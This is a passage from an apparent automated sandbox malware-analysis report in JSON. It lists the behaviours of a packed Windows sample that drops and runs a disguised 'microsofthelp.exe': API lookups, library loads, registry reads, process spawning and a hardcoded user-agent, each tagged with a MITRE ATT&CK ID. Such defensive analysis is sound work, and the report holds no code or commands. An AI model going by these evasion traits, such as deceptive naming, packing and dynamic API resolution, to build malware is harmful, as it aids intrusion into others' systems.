\"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter GetUserNameExA (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthorityCount (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthority (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter SHGetKnownFolderPath (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CopySid (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidW (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter RegGetValueA (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter WinHttpCreateProxyResolver (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter EventActivityIdControl (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter WSAIoctl (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter NotifyIpInterfaceChange (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter NotifyUnicastIpAddressChange (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter GetBestInterfaceEx (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter GetIfEntry2 (UID: 00000000-00000964)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"1300140054f43375@RPCRT4.dll\"\n \"0d000e00844b466c@iphlpapi.dll\"\n \"0f001000dc4b466c@iphlpapi.dll\"\n \"0c000d00244c466c@iphlpapi.dll\"\n \"140015006c4c466c@iphlpapi.dll\"\n \"0c000d00e04c466c@iphlpapi.dll\"\n \"15001600c03e466c@ADVAPI32.dll\"\n \"0e000f00703f466c@ADVAPI32.dll\"\n \"0e000f00cc3f466c@ADVAPI32.dll\"\n \"11001200b447466c@ADVAPI32.dll\"\n \"110012004848466c@ADVAPI32.dll\"\n \"120013008c48466c@ADVAPI32.dll\"\n \"12001300e448466c@ADVAPI32.dll\"\n \"14001500386e466c@ADVAPI32.dll\"\n \"14001500506e466c@ADVAPI32.dll\"\n \"14001500686e466c@ADVAPI32.dll\"\n \"17001800806e466c@ADVAPI32.dll\"\n \"0d000e00986e466c@ADVAPI32.dll\"\n \"11001200a86e466c@ADVAPI32.dll\"\n \"11001200bc6e466c@ADVAPI32.dll\"\n \"0d000e004466466c@WININET.dll\"\n \"0d000e00b466466c@WININET.dll\"\n \"10001100ec66466c@WININET.dll\"\n \"100011009067466c@WININET.dll\"\n \"10001100006f466c@WININET.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"CreateProcessA\" with parameter \"%WINDIR%\\microsofthelp.exe\" - (UID: 00000000-00006008)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\" has an executable section named \".MPRESS1\"\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\" has an executable section named \".MPRESS2\"\n \"microsofthelp.exe.bin\" has an executable section named \".MPRESS1\"\n \"microsofthelp.exe.bin\" has an executable section named \".MPRESS2\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\" has an writable section named \".MPRESS1\"\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\" has an writable section named \".MPRESS2\"\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\" has an writable section named \".idata2\"\n \"microsofthelp.exe.bin\" has an writable section named \".MPRESS1\"\n \"microsofthelp.exe.bin\" has an writable section named \".MPRESS2\"\n \"microsofthelp.exe.bin\" has an writable section named \".idata2\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-307", "type": 2, "relevance": 1, "name": "Contains ability to create/load registry keys (API string)", "description": "Found reference to API \"RegCreateKeyA\" (Indicator: \"RegCreateKey\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API \"RegCreateKeyA\" (Indicator: \"RegCreateKey\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API \"RegCreateKeyA\" (Indicator: \"RegCreateKey\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-319", "type": 2, "relevance": 1, "name": "Contains ability to set/get the last-error code for a calling thread (API string)", "description": "Found reference to API \"GetLastError\" (Indicator: \"GetLastError\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API \"GetLastError\" (Indicator: \"GetLastError\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API \"GetLastError\" (Indicator: \"GetLastError\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-127", "type": 2, "relevance": 1, "name": "Found user-agent related strings", "description": "Found string \"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; CIBA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)\" (Indicator: \"mozilla/4.0 (\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found string \"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; CIBA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)\" (Indicator: \"mozilla/4.0 (\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-625", "type": 2, "relevance": 1, "name": "References Windows filepaths for DLLs (possible dropped files)", "description": "Observed system executable string:\"%WINDIR%\\HidePlugin.dll\" [Source: 00000000-00005804-00000C28-50465179]", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 702f0000\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" loaded module \"KERNEL32\" at base 75920000\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69dc0000\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" loaded module \"KERNEL32.DLL\" at base 75920000\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74c10000\n \"microsofthelp.exe\" loaded module \"%WINDIR%\\HIDEPLUGIN.DLL\" at base 0\n \"microsofthelp.exe\" loaded module \"SECUR32.DLL\" at base 74a90000\n \"microsofthelp.exe\" loaded module \"RPCRT4.DLL\" at base 750d0000\n \"microsofthelp.exe\" loaded module \"SHELL32.DLL\" at base 76210000\n \"microsofthelp.exe\" loaded module \"OLE32.DLL\" at base 75300000\n \"microsofthelp.exe\" loaded module \"ADVAPI32.DLL\" at base 75ba0000\n \"microsofthelp.exe\" loaded module \"PROFAPI.DLL\" at base 74d70000\n \"microsofthelp.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 70f50000\n \"microsofthelp.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-OLE32-L1-1-0.DLL\" at base 74eb0000\n \"microsofthelp.exe\" loaded module \"WS2_32.DLL\" at base 756a0000\n \"microsofthelp.exe\" loaded module \"WINHTTP.DLL\" at base 71270000\n \"microsofthelp.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 74730000\n \"microsofthelp.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHIP6.DLL\" at base 74720000\n \"microsofthelp.exe\" loaded module \"IPHLPAPI.DLL\" at base 730d0000\n \"microsofthelp.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 702f0000\n \"microsofthelp.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"microsofthelp.exe\" loaded module \"KERNEL32\" at base 75920000\n \"microsofthelp.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006008)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\HidePlugin.dll (UID: 00000000-00005804)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00005804)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005804)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005804)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00005804)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-ole32-l1-1-0.dll (UID: 00000000-00005804)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00005804)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter winhttp.dll (UID: 00000000-00005804)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter IPHLPAPI.DLL (UID: 00000000-00005804)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\HidePlugin.dll (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-ole32-l1-1-0.dll (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter winhttp.dll (UID: 00000000-00000964)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter IPHLPAPI.DLL (UID: 00000000-00000964)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"microsofthelp.exe\" failed to load missing module \"%WINDIR%\\HidePlugin.dll\" - [base:0; Status:c000012f]\n \"microsofthelp.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"microsofthelp.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 750D0000\n \"microsofthelp.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 750D0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"microsofthelp.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"microsofthelp.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"microsofthelp.exe\" (UID: 00000000-00005804)\n Spawned process \"microsofthelp.exe\" (UID: 00000000-00000964)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"microsofthelp.exe\" (UID: 00000000-00005804)\n Spawned process \"microsofthelp.exe\" (UID: 00000000-00000964)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"microsofthelp.exe\" (UID: 00000000-00000964) was launched with new environment variables: \"PROMPT=\"$P$G\"\"\n Process \"microsofthelp.exe\" (UID: 00000000-00000964) was launched with modified environment variables: \"PSModulePath, PATHEXT\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\" was detected as \"MPRESS\" and name: \"Packer\"\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"microsofthelp.exe.bin\" was detected as \"MPRESS\" and name: \"Packer\"\n \"microsofthelp.exe.bin\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-79", "relevance": 1, "name": "Contains ability to dynamically determine API calls", "description": "Found GetProcAddress() and LoadLibraryA() in an import section (Source: a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc)\n Found GetProcAddress() and LoadLibraryA() in an import section (Source: microsofthelp.exe.bin)", "origin": "Static Parser", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "string-354", "type": 2, "relevance": 1, "name": "Contains reference to mutex-related activity (API string)", "description": "Found reference to API \"CreateMutexA\" (Indicator: \"CreateMutex\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API \"CreateMutexA\" (Indicator: \"CreateMutex\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API \"CreateMutexA\" (Indicator: \"CreateMutex\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" trying to access non-existent file \"C:\\iphlpapi.dll\"\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" trying to access non-existent file \"C:\\WINNSI.DLL\"\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" trying to access non-existent file \"C:\\IPHLPAPI.DLL\"\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" trying to access non-existent file \"C:\\VERSION.DLL\"\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"\n \"microsofthelp.exe\" trying to access non-existent file \"C:\\Windows\\iphlpapi.dll\"\n \"microsofthelp.exe\" trying to access non-existent file \"C:\\Windows\\WINNSI.DLL\"\n \"microsofthelp.exe\" trying to access non-existent file \"C:\\Windows\\version.DLL\"\n \"microsofthelp.exe\" trying to access non-existent file \"C:\\Windows\\FLTLIB.DLL\"\n \"microsofthelp.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" reads file \"c:\\a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\"\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" reads file \"c:\\windows\\microsofthelp.exe\"\n \"microsofthelp.exe\" reads file \"c:\\windows\\microsofthelp.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"\"; Value: \"\")\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\\TRACING\"; Key: \"\"; Value: \"\")\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLEAUT\"; Key: \"\"; Value: \"\")\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n 